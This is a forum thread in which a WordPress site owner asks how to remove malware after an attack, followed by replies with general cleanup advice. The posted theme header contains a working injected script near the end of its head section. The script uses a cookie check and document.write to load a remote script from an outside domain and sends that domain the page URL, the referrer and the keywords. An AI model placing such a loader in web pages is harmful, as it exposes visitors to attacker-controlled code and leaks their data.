S
S
Sergey Gulin2016-11-23 12:04:43
Malware
Sergey Gulin, 2016-11-23 12:04:43

Viruses on WP, can't find what to do?

Good day to all, a major attack was made on the site, and a large number of malware was uploaded. Here is one of the code examples, I can't find it myself:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

  <title><?php bloginfo('name'); ?><?php wp_title(); ?></title>

  <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />	
  <meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats please -->

  <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
  <link rel="stylesheet" href="<?php bloginfo('stylesheet_directory'); ?>/css/flexslider.css" type="text/css" />
  <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
  <link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
  <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
  <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
  
  <?php wp_enqueue_script('jquery'); ?>
  <?php wp_enqueue_script('jquery-ui-tabs'); ?>
  <?php //wp_enqueue_script('jcarousellite', get_template_directory_uri() . '/js/jcarousellite_1.0.1.min.js', array( 'jquery' ), '', true);?>
  <?php wp_enqueue_script('flexslider', get_template_directory_uri() . '/js/jquery.flexslider-min.js', array( 'jquery' ), '', true);?>
  <?php wp_get_archives('type=monthly&format=link'); ?>
  <?php //comments_popup_script(); // off by default ?>
  <?php wp_head(); ?>
  
  <!-- Yandex.Metrika counter -->
  <script type="text/javascript">
  (function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
      try {
        w.yaCounter123 = new Ya.Metrika({id:123,
            clickmap:true,
            trackLinks:true,
            accurateTrackBounce:true});
      } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
      s = d.createElement("script"),
      f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
      d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
  })(document, window, "yandex_metrika_callbacks");
  </script>
  <noscript><div><img src="//mc.yandex.ru/watch/123" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
  <!-- /Yandex.Metrika counter -->
  <script>
    jQuery(document).ready(function($) {
      $('.page-item-4620 a').attr("href", "http://site.ru/");
      $('.page-item-4620 a').attr("target", "_blank");
      $('.page-item-4624 a').attr("href", "http://site.ru/");
      $('.page-item-4624 a').attr("target", "_blank");
    })
  </script>
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://talentosdavidfischman.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body>
<div id="wrapper">
  <div id="header">
    <div id="branding">
      <div class="stitle" role="banner" onclick="location.href='/';" style="cursor: pointer;">
        123
      </div>
      <div class="enter"><a href="/wp-admin">Войти</a></div>
      <div class="social">
        <a class="twit" target="_about:blank" href="http://twitter.com" title = "Твиттер"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/twitter.gif" height="30" /> </a>
        <a class="vk" target="_about:blank" href="http://vk.com" title = "ВКонтакте"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/vk.gif" height="30" /> </a>
        <a class="fb" target="_about:blank" href="http://facebook.com" title = "Facebook"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/fb.gif" height="30" /> </a>
        <a class="jj" target="_about:blank" href="http://livejournal.com/" title = "ЖивойЖурнал"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/livejournal.gif" height="30" /> </a>
        <a class="rss" target="_about:blank" href="/feed" title = "Новостная лента"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/rss.gif" height="30" /> </a>
      </div>
      <div class="search">
        <?php get_search_form(); ?>
      </div>
    </div>
  </div> <!-- #header -->
  
  <div id="nav-menu">
        <?php wp_nav_menu( array( 'container_class' => 'menu-header', 'theme_location' => 'primary' ) ); ?> 
  </div>
    
  <div id="main">

Answer the question

In order to leave comments, you need to log in

4 answer(s)
M
Maxim Timofeev, 2016-11-23
@webinar

Everything is very simple, use the backup beforehand, ideally close the holes through which the attack was made.

I
Ivan Sergeev, 2016-11-23
@ivan3008

Antiviruses for computers do not work well to catch this type of infection.
Try a special utility for cleaning sites - I cured a few with it, there were no problems:
Link
Displays a list of infected and suspicious files - and the places where the malicious code is located

B
bsf, 2016-11-23
@bsf

From practice, the scheme is usually like this, if the copies are also "sick".
If the OS is on a Windows computer, then disable all antiviruses. We merge the site to the computer via ftp. We archive with a password so that the antivirus does not clean everything in the archive. We turn on the antivirus and poison it on the directory. We look at what swears and start removing all injections in the code with handles.
The chrome console also helps with cleaning. If the virus code is loaded from the left site, then you can track through which js file.

A
Ankhena, 2016-11-23
@Ankhena

Somehow I sent a file to Doctor Web, they helped.
And the hoster is also interested in sites without viruses, so support usually helps.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question